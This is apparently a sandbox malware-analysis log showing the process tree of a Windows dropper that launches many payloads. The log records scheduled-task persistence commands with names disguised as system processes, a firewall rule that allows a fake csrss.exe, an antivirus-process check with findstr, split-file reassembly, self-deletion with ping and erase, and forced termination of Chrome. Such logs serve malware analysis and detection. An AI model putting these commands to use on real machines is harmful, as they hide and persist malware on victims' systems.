PID:7880

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.11.1914555855\1045445525" -childID 8 -isForBrowser -prefsHandle 6632 -prefMapHandle 6628 -prefsLen 27123 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e269d94f-ce16-4e82-a5cf-4964c7fb21e6} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 6644 135ae315158 tab
2⤵
PID:8424

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
1⤵
PID:7024

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:6340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3924 -ip 3924
1⤵
PID:7936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 9048 -ip 9048
1⤵
PID:8060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 9048 -ip 9048
1⤵
PID:8864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 9048 -ip 9048
1⤵
PID:9120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 9048 -ip 9048
1⤵
PID:6520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 9048 -ip 9048
1⤵
PID:8376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 9048 -ip 9048
1⤵
PID:2456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 9048 -ip 9048
1⤵
PID:8580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 9048 -ip 9048
1⤵
PID:7204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9048 -ip 9048
1⤵
PID:8632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 9048 -ip 9048
1⤵
PID:5940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 9048 -ip 9048
1⤵
PID:8716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 9048 -ip 9048
1⤵
PID:7960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 9048 -ip 9048
1⤵
PID:7916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 9048 -ip 9048
1⤵
PID:8788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 9048 -ip 9048
1⤵
PID:8820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 9048 -ip 9048
1⤵
PID:8892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 9048 -ip 9048
1⤵
PID:5892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 9048 -ip 9048
1⤵
PID:7200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 9048 -ip 9048
1⤵
PID:8676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4820 -ip 4820
1⤵
PID:6164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4820 -ip 4820
1⤵
PID:8228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4820 -ip 4820
1⤵
PID:6680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4820 -ip 4820
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4820 -ip 4820
1⤵
PID:9172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4820 -ip 4820
1⤵
PID:6984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4820 -ip 4820
1⤵
PID:8548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4820 -ip 4820
1⤵
PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4820 -ip 4820
1⤵
PID:5836

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:9136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5588 -ip 5588
1⤵
PID:7428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5588 -ip 5588
1⤵
PID:7408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5588 -ip 5588
1⤵
PID:7400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5588 -ip 5588
1⤵
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5588 -ip 5588
1⤵
PID:6576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5588 -ip 5588
1⤵
PID:6620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5588 -ip 5588
1⤵
PID:6736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5588 -ip 5588
1⤵
PID:6336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5588 -ip 5588
1⤵
PID:6512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5588 -ip 5588
1⤵
PID:8808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5588 -ip 5588
1⤵
PID:888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5588 -ip 5588
1⤵
PID:8516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5588 -ip 5588
1⤵
PID:8652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5588 -ip 5588
1⤵
PID:3068

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
2⤵
PID:6872

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.0.234466807\604262955" -parentBuildID 20221007134813 -prefsHandle 1744 -prefMapHandle 1728 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0751edd5-d0d7-4927-b24b-809b7ff54c92} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 1848 135a6d07758 gpu
3⤵
PID:6080

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.1.1039058130\1387024450" -parentBuildID 20221007134813 -prefsHandle 2276 -prefMapHandle 2272 -prefsLen 21563 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98c8c03c-8cb0-4f35-8eda-ec6234a58b70} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 2288 135a58eda58 socket
3⤵
PID:1940

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.2.363690350\2066948561" -childID 1 -isForBrowser -prefsHandle 3088 -prefMapHandle 3084 -prefsLen 21601 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5472e6fc-09f2-4da5-99b5-11378a4ae8b0} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 3136 135aa8b2958 tab
3⤵
PID:3932

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.3.441768046\2045661332" -childID 2 -isForBrowser -prefsHandle 3672 -prefMapHandle 3668 -prefsLen 26064 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5391c7a9-f666-4c2d-b3f6-2b383bc1cfa4} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 3684 13599a61c58 tab
3⤵
PID:5896

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.6.1898365515\184347213" -childID 5 -isForBrowser -prefsHandle 5124 -prefMapHandle 5128 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82af3217-3738-4cc0-89b2-4c0fdd09b42b} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 4808 135acff0058 tab
3⤵
PID:7664

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.5.607140836\669858525" -childID 4 -isForBrowser -prefsHandle 4928 -prefMapHandle 4932 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0f34f88-8a55-47f2-b08a-d8ffb2ae0b62} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 5008 135acfef458 tab
3⤵
PID:7656

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.4.1623342833\1706309548" -childID 3 -isForBrowser -prefsHandle 4776 -prefMapHandle 4220 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5eebe02b-e3d5-4389-a11d-81bdce5c02f4} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 4792 135ab3eb458 tab
3⤵
PID:7644

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.8.976408381\1647943945" -childID 7 -isForBrowser -prefsHandle 4960 -prefMapHandle 4956 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {927c7268-fb5e-48e5-91a5-0f1d8b7b1087} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 4968 135ad96fe58 tab
3⤵
PID:8108

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.7.274971503\745648296" -childID 6 -isForBrowser -prefsHandle 5512 -prefMapHandle 5508 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b70f74c8-cfa2-4ecb-9176-a0ac18767123} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 5520 135ad96f858 tab
3⤵
PID:8100

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.9.1552088782\1400342802" -parentBuildID 20221007134813 -prefsHandle 6040 -prefMapHandle 6036 -prefsLen 26379 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7387ede4-8e15-47bb-8f1b-427cd589512c} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 6052 135adc68258 rdd
3⤵
PID:6496

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.10.1462183097\52854114" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 6180 -prefMapHandle 6176 -prefsLen 26379 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d81dcf89-14bd-4d8f-91c2-6ab447c4577f} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 6188 135ae816558 utility
3⤵
PID:7880

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6872.11.1914555855\1045445525" -childID 8 -isForBrowser -prefsHandle 6632 -prefMapHandle 6628 -prefsLen 27123 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e269d94f-ce16-4e82-a5cf-4964c7fb21e6} 6872 "\\.\pipe\gecko-crash-server-pipe.6872" 6644 135ae315158 tab
3⤵
PID:8424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:7392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\odt\msedge.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "tuc4.tmpt" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\tuc4.tmp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Application Data\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Msblockreview" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\odt\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\odt\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\odt\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Music\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\Music\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Music\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\Msblockreview.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\Admin\Application Data\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hack1226h" /sc MINUTE /mo 6 /tr "'C:\odt\hack1226.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\odt\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BroomSetupB" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\BroomSetup.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft\Storage Health\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft\Storage Health\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\Storage Health\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\audiodg.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7772

C:\Windows\SysWOW64\PING.EXE
ping google.com
1⤵
- Runs ping.exe
PID:7356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BroomSetup" /sc ONLOGON /tr "'C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\BroomSetup.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BroomSetupB" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\BroomSetup.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\odt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\odt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hack1226h" /sc MINUTE /mo 8 /tr "'C:\odt\hack1226.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hack1226" /sc ONLOGON /tr "'C:\odt\hack1226.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Application Data\audiodg.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "tuc4.tmp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\tuc4.tmp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:9024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "tuc4.tmpt" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\tuc4.tmp.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\odt\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\odt\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8252

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:8088

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1164

C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe"
2⤵
PID:7960

C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
2⤵
- Executes dropped EXE
PID:3924

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
PID:7472

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /im chrome.exe /f
4⤵
- Kills process with taskkill
PID:9016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 1004
3⤵
- Program crash
PID:8156

C:\Users\Admin\AppData\Local\Temp\Files\RiseBuild.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RiseBuild.exe"
2⤵
- Executes dropped EXE
PID:2112

C:\Users\Admin\AppData\Local\Temp\Files\GorgeousMovement.exe
"C:\Users\Admin\AppData\Local\Temp\Files\GorgeousMovement.exe"
2⤵
- Executes dropped EXE
PID:1536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k cmd < Suddenly & exit
3⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:3888

C:\Windows\SysWOW64\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
5⤵
PID:2748

C:\Windows\SysWOW64\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe"
5⤵
PID:1136

C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir 6483
5⤵
PID:1416

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Antique + Assurance + Volkswagen + Succeed + Equations 6483\Accommodations.pif
5⤵
PID:5040

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Matches + Neck 6483\c
5⤵
PID:3492

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
5⤵
- Runs ping.exe
PID:1404

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\6483\Accommodations.pif
6483\Accommodations.pif 6483\c
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping google.com && erase C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\6483\Accommodations.pif
6⤵
PID:7828

C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
2⤵
- Executes dropped EXE
PID:556

C:\Users\Admin\AppData\Local\Temp\is-FCRHS.tmp\tuc2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FCRHS.tmp\tuc2.tmp" /SL5="$B0022,4518052,566784,C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:648

C:\Users\Admin\AppData\Local\QT Split Control Reference\qtsplitcontrolref.exe
"C:\Users\Admin\AppData\Local\QT Split Control Reference\qtsplitcontrolref.exe" -i
4⤵
- Executes dropped EXE
PID:416

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "QTSCR1213"
4⤵
PID:660

C:\Users\Admin\AppData\Local\QT Split Control Reference\qtsplitcontrolref.exe
"C:\Users\Admin\AppData\Local\QT Split Control Reference\qtsplitcontrolref.exe" -s
4⤵
- Executes dropped EXE
PID:4636

C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kb%5Efr_ouverture.exe"
2⤵
- Executes dropped EXE
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 724
3⤵
- Program crash
PID:1816

C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe"
2⤵
- Executes dropped EXE
PID:1708

C:\Users\Admin\AppData\Local\Temp\Files\go.exe
"C:\Users\Admin\AppData\Local\Temp\Files\go.exe"
2⤵
PID:1828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
3⤵
PID:1356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
